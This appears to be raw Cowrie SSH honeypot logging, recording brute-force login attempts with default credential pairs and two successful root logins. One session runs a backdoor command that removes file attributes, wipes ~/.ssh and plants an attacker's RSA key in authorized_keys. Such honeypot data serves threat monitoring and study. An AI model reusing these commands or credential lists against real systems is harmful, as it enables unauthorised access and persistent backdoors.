{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:16.688469Z","src_ip":"212.227.125.160","session":"4b845ed41c6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:59:16.758878Z","src_ip":"212.227.125.160","session":"4b845ed41c6b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:17.149288Z","src_ip":"212.227.125.160","session":"4b845ed41c6b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:18.236875Z","src_ip":"212.227.125.160","session":"4b845ed41c6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48852,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b27dbae23a9","protocol":"ssh","message":"New connection: 212.227.125.160:48852 (1.2.3.4:22) [session: 9b27dbae23a9]","sensor":"my-vps","timestamp":"2025-08-31T00:59:27.128107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:27.129241Z","src_ip":"212.227.125.160","session":"9b27dbae23a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:59:27.203540Z","src_ip":"212.227.125.160","session":"9b27dbae23a9"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:27.475004Z","src_ip":"212.227.125.160","session":"9b27dbae23a9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:28.642818Z","src_ip":"212.227.125.160","session":"9b27dbae23a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58584,"dst_ip":"1.2.3.4","dst_port":22,"session":"cec8b338d1f0","protocol":"ssh","message":"New connection: 212.227.125.160:58584 (1.2.3.4:22) [session: cec8b338d1f0]","sensor":"my-vps","timestamp":"2025-08-31T00:59:37.497630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:37.499006Z","src_ip":"212.227.125.160","session":"cec8b338d1f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:59:37.573239Z","src_ip":"212.227.125.160","session":"cec8b338d1f0"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:37.854247Z","src_ip":"212.227.125.160","session":"cec8b338d1f0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:39.009655Z","src_ip":"212.227.125.160","session":"cec8b338d1f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48626,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3402dd98ae8","protocol":"ssh","message":"New connection: 212.227.235.229:48626 (1.2.3.4:22) [session: a3402dd98ae8]","sensor":"my-vps","timestamp":"2025-08-31T00:59:43.252365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:44.221192Z","src_ip":"212.227.235.229","session":"a3402dd98ae8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:59:44.222122Z","src_ip":"212.227.235.229","session":"a3402dd98ae8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59870,"dst_ip":"1.2.3.4","dst_port":22,"session":"2be34b3d996a","protocol":"ssh","message":"New connection: 212.227.125.160:59870 (1.2.3.4:22) [session: 2be34b3d996a]","sensor":"my-vps","timestamp":"2025-08-31T00:59:47.882719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:47.883371Z","src_ip":"212.227.125.160","session":"2be34b3d996a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:59:47.957704Z","src_ip":"212.227.125.160","session":"2be34b3d996a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:48.305438Z","src_ip":"212.227.125.160","session":"2be34b3d996a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:49.451131Z","src_ip":"212.227.125.160","session":"2be34b3d996a"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456789","message":"login attempt [debian/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:50.059981Z","src_ip":"212.227.235.229","session":"a3402dd98ae8"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:51.162992Z","src_ip":"212.227.235.229","session":"a3402dd98ae8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51982,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5256b4c1c4d","protocol":"ssh","message":"New connection: 212.227.235.229:51982 (1.2.3.4:22) [session: c5256b4c1c4d]","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.210922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.212100Z","src_ip":"212.227.235.229","session":"c5256b4c1c4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.278628Z","src_ip":"212.227.235.229","session":"c5256b4c1c4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41760,"dst_ip":"1.2.3.4","dst_port":22,"session":"7712b0106199","protocol":"ssh","message":"New connection: 212.227.125.160:41760 (1.2.3.4:22) [session: 7712b0106199]","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.320388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.321048Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.395570Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"sprixin","message":"login attempt [ftptest/sprixin] failed","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.583697Z","src_ip":"212.227.235.229","session":"c5256b4c1c4d"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.698623Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54422,"dst_ip":"1.2.3.4","dst_port":22,"session":"c503499130ab","protocol":"ssh","message":"New connection: 212.227.235.229:54422 (1.2.3.4:22) [session: c503499130ab]","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.911818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.912894Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:59:58.986253Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:59:58.986984Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:59.062516Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:59.063814Z","src_ip":"212.227.125.160","session":"7712b0106199"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:59:59.156550Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:59:59.652091Z","src_ip":"212.227.235.229","session":"c5256b4c1c4d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz!@#$","message":"login attempt [root/1qaz!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:00:00.147345Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:00:00.646201Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:00:00.646935Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:00:00.648049Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:00.885597Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:00:01.429975Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:00:01.431869Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:00:01.689479Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:00:01.691804Z","src_ip":"212.227.235.229","session":"c503499130ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55676,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c50654aebc2","protocol":"ssh","message":"New connection: 212.227.235.229:55676 (1.2.3.4:22) [session: 9c50654aebc2]","sensor":"my-vps","timestamp":"2025-08-31T01:00:01.921507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:00:01.926607Z","src_ip":"212.227.235.229","session":"9c50654aebc2"}
